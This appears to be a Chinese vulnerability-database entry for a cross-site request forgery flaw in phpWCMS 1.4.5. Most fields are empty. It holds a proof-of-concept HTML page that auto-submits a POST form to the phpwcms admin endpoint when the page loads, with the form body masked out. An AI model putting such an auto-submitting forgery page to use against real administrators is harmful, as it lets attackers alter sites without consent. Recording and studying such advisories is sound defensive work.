PHPWCMS Cross-Site Request Forgery Vulnerability

基本字段

漏洞编号:
SSV-19837
披露/发现时间:
未知
提交时间:
2010-06-23
漏洞等级:
漏洞类别:
跨站请求伪造
影响组件:
phpWCMS
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.3KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
/*
Exploit Title: PHPWCMS Cross-Site Request Forgery Vulnerability
Date: 06/16/2010
Author: Jeremiah Talamantes
Software Link: http://phpwcms.googlecode.com/files/phpwcms_r398.zip
Version: 1.4.5 r398
Tested on: WinXP SP2 (EN) on WAMP 2.0
CVE: N/A
Jeremiah Talamantes
RedTeam Security (RedTeam Labs)
http://www.redteamsecure.com/labs
Description:
A vulnerability has been identified in PHPWCMS, which could be exploited to conduct cross-site request
forgery attacks.
This issue is caused due to input validation errors in the administrative interface when processing
HTTP requests,
which could be exploited by attackers to manipulate certain data by tricking an administrator into
visiting a malicious web page.
*/
?>
<html>
<head>
<title>PHPWCMS 1.4.5 r389 Cross Site Request Forgery</title>
<script type="text/javascript">
function myfunc () {
var frm = document.getElementById("csrf");
frm.submit();
}
window.onload = myfunc;
</script>
</head>
<body>
<!-- Modify the form action parameter to suit your installation -->
<form id="csrf" name="csrf" method="POST" action="http://localhost/phpwcms/phpwcms.php?do=files&f=0";>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1275
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负